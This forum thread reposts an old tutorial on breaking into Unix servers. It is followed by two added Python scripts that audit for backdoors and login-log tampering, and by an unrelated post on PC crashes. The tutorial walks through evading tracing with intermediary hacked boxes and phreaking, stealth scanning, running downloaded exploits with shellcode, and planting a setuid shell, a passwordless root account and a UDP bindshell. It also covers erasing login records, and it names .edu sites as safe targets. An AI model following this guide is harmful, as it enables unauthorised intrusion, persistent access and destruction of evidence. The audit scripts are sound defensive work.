
How to learn to hack in easy steps

Discussion in 'Tech, Gadgets & Science Forum' started by MziziMkavu, Jun 18, 2011.

  1. MziziMkavu

    MziziMkavu JF-Expert Member

    #1
    Jun 18, 2011
    Joined: Feb 3, 2009
    Messages: 38,549
    Likes Received: 2,822
    Trophy Points: 280
    How to learn to hack in easy steps
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


    Introduction
    ~~~~~~~~~~~~


    Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've
    met. I want to write this because most tutorials i've found (very good tutorials) are now
    old and don't fit just like they did before. This is why i'm going to teach you and show you
    the way to learn to hack.


    If you are a hacker, you read this, and find something that's not correct or you don't like,
    i want to know. mail me.


    I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
    i don't care at all as long as it's understandable.


    On this document I talk about many security tools, you can find all them and also contact
    me on my site: 3b0x.com


    When you finish reading it, please TELL ME how you like it!


    I want to make newer versions of it, check on my site to stay informed.


    COPYING: You're welcome to distribute this document to whoever the **** you want, post it
    on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
    If you want to perform it, ask me for permission. thanks a lot!


    DISCLAIMER: This document is intended for ludic or educational purposes. I don't want to
    promote computer crime and I'm not responsible for your actions in any way.
    If you want to hack a computer, do the decent thing and ask for permission first.






    Let's start
    ~~~~~~~~~~~


    If you read carefully all what i'm telling here, you are smart and you work **** it,
    you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
    A hacker is someone who is able to discover unknown vulnerabilities in software and able to
    write the proper codes to exploit them.


    NOTE: If you've been unlucky, and before you found this document, you've read the
    guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
    You won't understand some things from my tutorial until you unpoison your brain.




    Some definitions
    ~~~~~~~~~~~~~~~~


    I'm going to refer to every kind of computer as a box, and only as a box.
    This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
    Michael Knight's car, The Matrix, etc.


    The systems we're going to hack (with permission) are plenty of normal users, who
    don't have any remote idea about security, and the root. The root user is called
    superuser and is used by the admin to administer the system.


    I'm going to refer to the users of a system as lusers. Logically, I'll refer to
    the admin as superluser.






    Operating Systems
    ~~~~~~~~~~~~~~~~~


    Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
    or perhaps a mac (motorola) box running macOS.


    You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
    systems.
    This is for two main reasons:


    -the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
    so on. to hack one of them, you need a minimum knowledge of a UNIX system, and what's better
    than running it at home?


    -all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
    you're running some kind of it.


    Let's see where to find the unix you're interested on.


    The UNIX systems may be divided in two main groups:


    - commercial UNIXes
    - free opensource UNIXes


    A commercial unix's price is not like windoze's price, and it usually can't run on your box,
    so forget it.


    The free opensource UNIXes can also be divided in:
    - BSD
    These are older and difficult to use. The most secure OS (openBSD) is in this group.
    You don't want them unless you're planning to install a server on them.


    - Linux
    Easy to use, stable, secure, and optimized for your kind of box. that's what we need.


    I strongly suggest you to get the SuSE distribution of Linux.
    It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

    Visit Linux-Betriebssystem | SUSE Linux Enterprise and look for a local store or order it online.
    (i know i said it the software was free, but not the CDs nor the manual nor the support.
    It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)


    If you own an intel box, then order the PC version.


    If you own a mac box, then order the PowerPC version.


    Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.


    It's possible you have problem with your hardware on the installation. Read the manual, ask
    for technical support or buy new hardware, just install it as you can.


    This is really important! READ THE MANUAL, or even buy a UNIX book.
    Books about TCP/IP and C programming are also useful.


    If you don't, you won't understand some things i'll explain later. And, of course, you'll
    never become a hacker if you don't read a lot of that 'literature'.






    the Internet
    ~~~~~~~~~~~~


    Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
    You want to hack internet boxes! So lets connect to the internet.


    Yes, i know you've gotten this document from the internet, but that was with windoze
    and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
    You're a Linux user, and you gotta open your way to the Internet.


    You gotta make your Linux box to connect to the net,
    so go and set up your modem (using YaST2 in SuSE).


    Common problems:


    If your box doesn't detect any modems, that probably means that you have no modem installed
    :-D (not a joke!).


    Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
    specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
    winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
    driver emulates that missing chip. And that vendor driver is only available for windoze.




    ISA and external modems are more probably real modems, but not all of them.
    If you want to make sure whether a modem is or not a winmodem, visit http://start.at/modem.


    Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)


    NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
    internet with aol. You can't hack with aol. i don't like aol. aol sucks.
    Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
    leave aol and get a real ISP. Then you'll be forgiven.




    Don't get busted
    ~~~~~~~~~~~~~~~~




    Let's suppose you haven't skipped everything below and your Linux box is now connected to the net.


    It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.


    - Don't hack
    this is the most effective stealth technique. not even the FBI can bust you. :)
    If you choose this option, stop reading now, cause the rest is worthless and futile.


    - If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
    your own website or email address, find your ISP, your phone number, your home...
    and you get busted!!


    - be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
    NEVER tell others you've hacked a box.


    - NEVER hack directly from your box (your_box --> victim's box).
    Always use a third box in the middle (your_box --> lame_box --> victim's box).


    Where lame_box is a previously hacked box or...a shell account box!
    A shell account is a service where you get control of a box WITHOUT hacking it.
    There are a few places where shell accounts are given for free. One of them is nether.net.

    - Don't hack dangerous boxes until you're a real hacker.
    Which boxes are dangerous:
    Military boxes
    Government boxes
    Important and powerful companies' boxes
    Security companies' boxes
    Which boxes are NOT dangerous:
    Educational boxes (any .edu domain)
    Little companies' boxes
    Japanese boxes


    - Always connect to the internet through a free and anonymous ISP
    (did i tell you that AOL is NOT an ISP?)


    - Use phreaking techniques to redirect calls and use others' lines for your ISP call.
    Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.




    TCP ports and scanning
    ~~~~~~~~~~~~~~~~~~~~~~


    Do you got your stealth linux box connected to the internet (not aol)?
    Have you read the manual as i told you?




    Then we shall start with the **** real thing.


    First of all, you should know some things about the internet. It's based on the TCP/IP protocol,
    (and others)


    It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
    your data to be sent.


    So you can open a connection and send data to any these ports. Those ports are associated with
    a service:


    Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
    on the box, opens its port and offers their **** service.


    here are some common ports and their usual services (there are a lot more):


    Port number    Common service    Example daemon (d stands for daemon)
    21             FTP               FTPd
    23             Telnet            telnetd
    25             SMTP              sendmail (yes!)
    80             HTTP              apache
    110            POP3              qpop




    Example:
    when you visit the website http://www.host.com/luser/index.html, your browser does this:
    -it connects to the TCP port 80
    -it sends the string: "GET /luser/index.html HTTP/1.1" plus two 'intro'
    (it really sends a lot of things more, but that is the essential)
    -the host sends the html file


    The cool thing of daemons is they have really serious security bugs.


    That's why we want to know what daemons are running there, so...


    We need to know what ports are opened in the box we want to hack.


    How could we get that information?


    We gotta use a scanner. A scanner is a program that tries to
    connect to every port on the box and tells which of them are opened.


    The best scanner i can think of is nmap, created by Fyodor.
    You can get nmap from my site in tarball or rpm format.


    Let's install nmap from an .rpm packet.


    bash-2.03$ rpm -i nmap-2.53-1.i386.rpm


    then we run it:


    bash-2.03$ nmap -sS target.edu


    Starting nmap V. 2.53 by fyodor@insecure.org ( Nmap - Free Security Scanner For Network Exploration & Security Audits. )
    Interesting ports on target.edu (xx.xx.xx.xx):
    (The 1518 ports scanned but not shown below are in state: closed)
    Port State Service
    21/tcp open ftp
    23/tcp open telnet
    25/tcp open smtp
    80/tcp open http
    110/tcp open pop3




    Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds




    Nmap has told us which ports are opened on target.edu and thus, what services it's offering.


    I know, i said telnet is a service but is also a program (don't let this confuse you).
    This program can open a TCP connection to the port you specify.


    So lets see what's on that ports.


    On your linux console, type:


    bash-2.03$ telnet target.edu 21
    Trying xx.xx.xx.xx...
    Connected to target.edu.
    Escape character is '^]'.
    220 target.edu FTP server (SunOS 5.6) ready.
    quit
    221 Goodbye.
    Connection closed by foreign host.


    You see?
    They speak out some valuable information:
    -their operating system is SunOS 5.6
    -their FTP daemon is the standard provided by the OS.


    bash-2.03$ telnet target.edu 25
    Trying xx.xx.xx.xx...
    Connected to target.edu.
    Escape character is '^]'.
    220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 (EDT)
    quit
    221 2.0.0 target.edu closing connection
    Connection closed by foreign host.


    They like to tell us everything:
    -their SMTP daemon is sendmail
    -its version is 8.11.0/8.9.3


    Experiment with other ports to discover other daemons.


    Why is this information useful to us? cause the security bugs that can let us in depend
    on the OS and daemons they are running.


    But there is a problem here... such information can be faked!


    It's difficult to really know what daemons are they running, but we can know FOR SURE
    what's the operating system:


    bash-2.03$ nmap -sS target.edu


    Starting nmap V. 2.53 by fyodor@insecure.org ( Nmap - Free Security Scanner For Network Exploration & Security Audits. )
    Interesting ports on target.edu (xx.xx.xx.xx):
    (The 1518 ports scanned but not shown below are in state: closed)
    Port State Service
    21/tcp open ftp
    23/tcp open telnet
    25/tcp open smtp
    80/tcp open http
    110/tcp open pop3


    TCP Sequence Prediction: Class=random positive increments
    Difficulty=937544 (Good luck!)
    Remote operating system guess: Linux 2.1.122 - 2.2.14


    Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds


    Hey wasn't it SunOS 5.6? **** they're a bunch of lame fakers!


    We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
    but the information we've already gathered should be enough.


    This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
    what's the OS there and its very difficult to avoid it.


    Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
    you their difficulty is low, that means their TCP sequence is predictable and we
    can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.


    Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
    And we don't want the admins to get angry with us, that's why we used the -sS option.
    This way (most) hosts don't detect ANYTHING from the portscan.
    Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
    usage of nmap's features, read its man page:


    bash-2.03$ man nmap




    How to upload and compile programs
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


    The most obvious and simple way is using FTP:


    bash-2.03$ ls
    program.c
    sh-2.03$ ftp target.edu
    Connected to target.edu.
    220 target.edu FTP server (SunOS 5.6) ready.
    Name: luser
    331 Password required for luser.
    Password:
    230 User luser logged in.
    ftp> put program.c
    200 PORT command successful.
    150 ASCII data connection for program.c (204.42.253.18,57982).
    226 Transfer complete.
    ftp> quit
    221 Goodbye.




    But this is not a really good way. It can create logs that will make the admin to detect us.


    Avoid uploading it with FTP as you can, use cut&paste instead.


    Here's how to make it:


    we run a text editor
    sh-2.03$ pico exploit.c
    if it doesn't work, try this one:
    sh-2.03$ vi exploit.c
    Of course, you must learn how to use vi.


    Then open another terminal (i mean without x windows, CTRL+ALT+Fx to escape from xwindows to x,
    ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
    text from it. Change to your target and paste the code so you've 'uploaded' the file.


    To cut a text from the screen, you need to install the gpm packet from your linux distribution.
    This program lets you select and cut text with your mouse.


    If cut&paste doesn't work, you can also type it by hand (they aren't usually large).


    Once you get the .c file there, here's how to compile:


    sh-2.03$ gcc program.c -o program


    and execute:


    sh-2.03$ ./program






    Exploiting vulnerabilities
    ~~~~~~~~~~~~~~~~~~~~~~~~~~


    This is the most important part of our hacking experience. Once we know what target.edu
    is running, we can go to one of those EXPLOIT databases that are on the net.


    An exploit is a piece of code that exploits a vulnerability on its software. In the case of
    target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
    that fits. Note that sendmail is the buggiest and the **** daemon, thus the most easy
    exploitable. If your target has an old version, you'll probably get in easily.


    When we exploit a security bug, we can get:


    - a normal shell (don't know what a shell is? read a book of unix!)


    a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
    this one lets us send commands to the box, but we got limited privileges.
    - a root shell
    this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.


    These are some exploit databases i suggest you to visit:


    www.hack.co.za
    www.r00tabega.org
    www.rootshell.com
    SecurityFocus
    Fyodor's Exploit World, Exploits for many Operating Systems including Linux,Solaris,Microsoft,Macintosh. For Hackers, Hacking, Computer Security auditing & testing


    Every exploit is different to use, so read its text and try them.
    They usually come in .c language.


    The most standard and easy to use exploits are buffer overflows.
    I won't explain here how a buffer overflow does work,
    Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
    You can download it from my site. (3b0x.com)


    Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
    This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
    is different to every OS, so this is a strong reason to know what OS they're running.


    We edit the .c file we've downloaded and look for something like this:


    char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";


    This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.


    You gotta replace it by the shellcode for the OS your target is running.
    You can find shellcodes for most OSes on my site or create your own by reading
    the text i mentioned before (Smash The Stack For Fun And Profit).


    IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
    if they let you do it, then you shall continue.
    if they don't give you permission, STOP HERE and try with another one.
    shall you continue without their permission, you'd be inquiring law and
    i'm not responsible for your craziness in any way!!!


    You should have now the shell account, this is the time to use it!


    everything i explain on this section, do it through your shell account:


    bash-2.03$ telnet myshellaccount 23
    Trying xx.xx.xx.xx...
    Connected to yourshellaccount.
    Escape character is '^]'.
    Welcome to yourshellaccount
    login: malicioususer
    Password: (it doesn't display)
    Last login: Fry Sep 15 11:45:34 from <yourIPaddress>.
    sh-2.03$


    Here is a example of a buffer overflow (that doesn't really exist):


    we compile it:
    sh-2.03$ gcc exploit.c -o exploit
    we execute it:
    sh-2.03$ ./exploit
    This is a sendmail 8.9.11 exploit
    usage: ./exploit target port
    Sendmail works on port 25, so:
    sh-2.03$./exploit 25 target.edu
    Cool, '$' means we got a shell! Let's find out if we're root.
    $whoami
    root
    ****, we've rooted target.edu!
    $whyamiroot
    because you've hacked me! :) (just kidding)


    There are some exploits that don't give you root directly, but a normal shell.
    It depends on what luser is running the daemon. (sendmail is usually root)
    Then you'll have to upload a .c file with a local (local means it can't overflow
    a daemon, but a local program) overflow and compile it.


    Remember to avoid uploading it with FTP as you can.


    Other kind of exploit is the one that gives you access to the password file.
    If a host has port 23 (telnet) opened, we can login as a normal user
    (remote root logins are usually not allowed) by putting his/hers/its username
    and password. Then use the su command to become root.


    sh-2.03$ telnet target.edu 23
    Trying xx.xx.xx.xx...
    Connected to target.edu.
    Escape character is '^]'.
    We're running SunOS 5.7
    Welcome to target.edu


    login: luser
    Password: (it doesn't display)
    Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
    sh-2.03$ whoami
    luser
    Are we lusers?
    sh-2.03$ su root
    Password:
    Don't think so...
    sh-2.03$ whoami
    root
    sh-2.03$


    Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
    Then, let's suppose we've extracted the password from luser and root. We can't login as
    root so we login as luser and run su. su asks us for the root password, we put it and...
    rooted!!


    The problem here is that is not easy to extract a root password from a password file.
    Only 1/10 admins are idiot enough to choose a crackable password like a dictionary word
    or a person's name.


    I said some admins are idiot (some of them are smart), but lusers are the more most
    idiotest thing on a system. You'll find that luser's passwords are mostly easily cracked,
    you'll find that lusers set up rlogin doors for you to enter without a password, etc.
    Not to mention what happens when an admin gives a normal luser administrator privileges
    with sudo or something.


    To learn how to crack a password file and extract its passwords, download a document called
    "cracking UNIX passwords" by Zebal. You can get it from my site (3b0x.com).


    Of course, I haven't listed all the exploit kinds that exist, only the most common.






    Putting backdoors
    ~~~~~~~~~~~~~~~~~


    Ok, we've rooted the system. Then what?


    Now you're able to change the webpage of that .edu box. Is that what you want to do?
    Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
    box, but they're not ashaming them with such things.


    Hacktivism is good and respected. You can change the page of bad people with bad ideologies
    like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.


    REMEMBER: ask for permission first!


    No, this time you should do another thing. You should keep that system for you to play with
    as a toy! (remember: your_box --> lame_box --> victim's box)


    Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
    back in.
    And it may not be possible:
    - the admin changed his password to something uncrackable.
    - they updated sendmail to a newer version so the exploit doesn't work.


    So now we're root and we can do everything, we shall put some backdoors that let us get back in.


    It may be interesting to read the paper about backdoors I host on my site. (3b0x.com)


    Anyway, i'll explain the basics of it.


    1.How to make a sushi:


    To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
    permissions:


    sh-2.03$ cp /bin/sh /dev/nul
    In the strange case the admin looks at /dev, he wouldn't find something unusual cause
    /dev/null does exist (who notices the difference?).
    sh-2.03$ cd /dev
    sh-2.03$ chown root nul
    Should yet be root-owned, but anyway...
    sh-2.03$ chmod 4775 nul
    4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.


    We've finished our 'duty', let's logout:
    sh-2.03$ exit


    Then, when we come back some day:
    sh-2.03$ whoami
    luser
    sh-2.03$ /dev/nul
    sh-2.03$ whoami
    root
    We're superluser again!




    There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
    we'd upload then the shell we want and make a sushi with it.
    The shell we want for this is SASH. A stand-alone shell with built-in commands.
    This one doesn't drop suid perms, and the commands are built-in, so external commands
    can't drop perms too! Remember to compile it for the architecture of the target box.
    Do you know where to get sash from? From my site :). (3b0x.com)


    2.How to add fake lusers.


    You gotta manipulate the users file: /etc/passwd
    try this:
    sh-2.03$ pico /etc/passwd
    if it doesn't work, try this:
    sh-2.03$ vi /etc/passwd
    Of course, you must learn how to use vi.


    This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell


    When uid=0 and gid=0, that luser gets superluser privileges.


    Then we add a line like this:


    dood::0:0:dood:/:/bin/sh (put it in a hidden place)




    So, once we get a shell, we type:
    sh-2.03$ su dood
    sh-2.03$ whoami
    dood


    And now we're root because dood's uid=0 and gid=0.


    Smart admins usually look for anomalies on /etc/passwd. The best way is to use a fake
    program in /bin that executes the shell you want with suid perms.


    I haven't got such a program at my site, but it shouldn't be difficult to develop.




    3.How to put a bindshell.


    A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
    The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
    and give a shell to you when you connect. The cool thing of UDP is this:


    If the admin uses a scanner to see what TCP ports are open, he wouldn't find anything!
    They rarely remember UDP exists.


    You can get an UDP bindshell coded by !hispahack from my site.




    Cleaning up
    ~~~~~~~~~~~


    Remember when we logged in to target.edu as luser, and used su to become root?
    Take a look to this line:


    Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.


    Yes, that was displayed by the target box when we logged in there.
    It refers to the last login that the real luser did.


    So, what will be displayed when luser logs in again?


    Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.


    Then luser writes a mail to the admin:


    "It has happen some strange thing, when I loggedin today, I've read a line like this:


    Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.


    Does it mean I did login yesterday? It can't be, I don't work on sundays!
    I think it's a bug and this is your fault."


    The admin responds to luser:


    "That wasn't a bug! this line means someone acceded the system using your password, don't
    worry for that, we got his IP. That means we can ask his ISP what phone number did call
    at 10:32 and get <yourIPaddress>. Then we shall call the police and he'll get busted"


    So you'll get busted because luser was a bit clever (sometimes happens).


    So we gotta find a way to delete that.


    This information can be stored in:

    /usr/adm/lastlog
    /var/adm/lastlog
    /var/log/lastlog


    and we can erase it using lled (get it from my site)


    lled has a built-in help that explains how to use it, remember to chmod the fake file
    created by lled like the substitute lastlog file.


    There is also some information we'd like to erase:


    Remember when i told you not to use FTP? Well, in case you did it, you must now
    use wted to clean up. Its syntax is very similar to lled.
    you can get it from my site.




    The who command shows us (and the admin) which lusers are logged in at the moment.
    What if we login and the admin is there?


    sh-2.03$ who
    root tty1 Sep 25 18:18


    Then we shall use zap2. If you logged in as 'luser', then type:


    sh-2.03$ ./zap2 luser
    Zap2!
    sh-2.03$ who
    sh-2.03$


    And luser has never been here.




    Greetings
    ~~~~~~~~~


    Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you
    decide to continue learning and become a real hacker. You can visit my site (3b0x.com)
    for more advanced tutorials so you can improve your skills.


    I'd get very happy if you send me a mail telling me your impression about this paper (whether
    is good or bad), and you help me to improve it.


    I'd like to send my greetings to every hacker that has taught me in any way, through newsgroups
    or other tutorials like this one. thanks to all.




    This paper was written on 26-9-00 by TDC


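Added example, not part of the original post or of any tool it mentions: a Python audit for the three backdoor techniques the post above describes (a setuid copy of a shell hidden under /dev, an extra UID-0 line with an empty password in /etc/passwd, and a daemon listening on UDP). The function names, the skip list, the allowlist of expected UDP ports and all sample data are assumptions constructed for illustration.

```python
import os
import socket
import stat
import struct
import tempfile

# Constructed sample data; the last passwd line is the one shown in the post.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
luser:x:1000:100:Local User:/home/luser:/bin/bash
dood::0:0:dood:/:/bin/sh
"""
SAMPLE_PROC_NET_UDP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
  101: 00000000:0044 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 15001 2 0000000000000000 0
  102: 0100007F:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000   101        0 15002 2 0000000000000000 0
  103: 00000000:7A69 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 15003 2 0000000000000000 0
"""


def audit_passwd(text):
    """Return (line_no, account, reason) for extra UID-0 accounts and empty passwords."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.strip().split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed entry"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((line_no, name, "UID 0 but not named root"))
        if password == "":
            findings.append((line_no, name, "empty password field"))
    return findings


def audit_device_dir(root="/dev", skip=("shm", "mqueue")):
    """Return (path, octal_mode, reasons) for regular files under a device directory."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        # tmpfs mounts under /dev legitimately hold regular files; review them separately
        dirnames[:] = [d for d in dirnames if d not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)              # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue                         # device nodes, sockets, links are expected
            reasons = ["regular file in device directory"]
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                reasons.append("setuid/setgid bit set")
            findings.append((path, oct(stat.S_IMODE(st.st_mode)), reasons))
    return findings


def audit_udp(proc_net_udp, expected_ports):
    """Return (ip, port, uid, inode) for unconnected IPv4 UDP sockets on unexpected ports."""
    findings = []
    for line in proc_net_udp.splitlines()[1:]:   # first line is the column header
        cols = line.split()
        if len(cols) < 10 or cols[2] != "00000000:0000":
            continue                             # short line, or a connected client socket
        ip_hex, port_hex = cols[1].split(":")
        port = int(port_hex, 16)
        if port in expected_ports:
            continue
        # /proc/net/udp prints the IPv4 address as little-endian hex on x86
        ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
        findings.append((ip, port, int(cols[7]), int(cols[9])))
    return findings


def demo():
    """Run all three checks on constructed data; nothing on the real host is read."""
    with tempfile.TemporaryDirectory() as fake_dev:
        planted = os.path.join(fake_dev, "nul")  # stands in for the post's /dev/nul copy
        with open(planted, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
        os.chmod(planted, 0o4775)
        dev = [(os.path.basename(p), mode, why)
               for p, mode, why in audit_device_dir(fake_dev)]
    udp = audit_udp(SAMPLE_PROC_NET_UDP, expected_ports={53, 68})
    return audit_passwd(SAMPLE_PASSWD), dev, udp


if __name__ == "__main__":
    for group in demo():
        for finding in group:
            print(finding)
```

On a real host, pass the contents of /etc/passwd and /proc/net/udp and leave `root` at its default of /dev; /dev/shm and /dev/mqueue are skipped by name and need their own review.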
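Added example, not part of the original post: a Python consistency check for the login records discussed in the "Cleaning up" section above. It assumes the Linux/glibc x86-64 record layouts, assumes that wiping tools leave an all-zero record behind, and assumes the lastlog and wtmp timestamps for one login agree within two seconds; the sample records are constructed.

```python
import struct

# Assumed layouts: Linux/glibc on x86-64. Other platforms differ.
UTMP = struct.Struct("<hxxi32s4s32s256shhiii4i20x")   # 384-byte utmp/wtmp record
LASTLOG = struct.Struct("<i32s256s")                  # 292-byte slot, indexed by UID
USER_PROCESS = 7                                      # ut_type of a user login
SLACK = 2                                             # assumed clock slack in seconds


def _text(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def read_wtmp(data):
    """Return one (type, user, host, time) tuple per record; None for an all-zero record."""
    records = []
    for off in range(0, len(data) - UTMP.size + 1, UTMP.size):
        chunk = data[off:off + UTMP.size]
        if not any(chunk):
            records.append(None)
            continue
        f = UTMP.unpack(chunk)
        records.append((f[0], _text(f[4]), _text(f[5]), f[9]))
    return records


def check_login_records(wtmp, lastlog, uid_names):
    """Cross-check wtmp against lastlog and report records that do not add up."""
    findings = []
    records = read_wtmp(wtmp)
    for idx, rec in enumerate(records):
        if rec is None:
            findings.append(("wtmp", idx, "all-zero record (entry overwritten)"))
    logins = {}                                       # user -> set of login times
    for rec in records:
        if rec and rec[0] == USER_PROCESS:
            logins.setdefault(rec[1], set()).add(rec[3])
    times = [rec[3] for rec in records if rec]
    oldest = min(times) if times else None            # older logins may have been rotated out
    for uid, name in sorted(uid_names.items()):
        off = uid * LASTLOG.size
        if off + LASTLOG.size > len(lastlog):
            continue
        ll_time, _line, ll_host = LASTLOG.unpack_from(lastlog, off)
        seen = logins.get(name, set())
        matched = any(abs(t - ll_time) <= SLACK for t in seen)
        if ll_time and oldest is not None and ll_time >= oldest and not matched:
            findings.append(("lastlog", name, "last login at %d from %s has no wtmp record"
                             % (ll_time, _text(ll_host))))
        if seen and max(seen) > ll_time + SLACK:
            findings.append(("lastlog", name,
                             "wtmp login at %d is newer than lastlog" % max(seen)))
    return findings


def make_utmp(ut_type, user, host, when):
    """Build one constructed wtmp record (pid, line and id are placeholders)."""
    return UTMP.pack(ut_type, 4242, b"pts/0", b"ts/0", user.encode(), host.encode(),
                     0, 0, 0, when, 0, 0, 0, 0, 0)


def build_sample():
    """Constructed data: one wiped wtmp record, one lastlog slot set back to an old time."""
    wtmp = (make_utmp(USER_PROCESS, "luser", "192.0.2.10", 1000)
            + bytes(UTMP.size)                        # record overwritten with zeros
            + make_utmp(USER_PROCESS, "root", "", 3000)
            + make_utmp(USER_PROCESS, "admin", "192.0.2.20", 4000))
    lastlog = bytearray(LASTLOG.size * 1002)
    LASTLOG.pack_into(lastlog, 0, 3000, b"tty1", b"")
    LASTLOG.pack_into(lastlog, 1000 * LASTLOG.size, 2000, b"pts/0", b"198.51.100.7")
    LASTLOG.pack_into(lastlog, 1001 * LASTLOG.size, 500, b"pts/1", b"192.0.2.20")
    return wtmp, bytes(lastlog), {0: "root", 1000: "luser", 1001: "admin"}


if __name__ == "__main__":
    for finding in check_login_records(*build_sample()):
        print(finding)
```

Shipping these files to a remote log host as they are written gives the comparison a copy that a local root user cannot edit.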
     
  2. MziziMkavu

    MziziMkavu JF-Expert Member

    #2
    Jun 18, 2011
    Joined: Feb 3, 2009
    Messages: 38,549
    Likes Received: 2,822
    Trophy Points: 280
    10 reasons why PCs crash U must Know


    "Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."


    You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?


    1 Hardware conflict


    The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.


    For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.


    If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:


    * Start-Settings-Control Panel-System-Device Manager.


    Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.


    Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.


    Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is DriverGuide. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).


    When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.


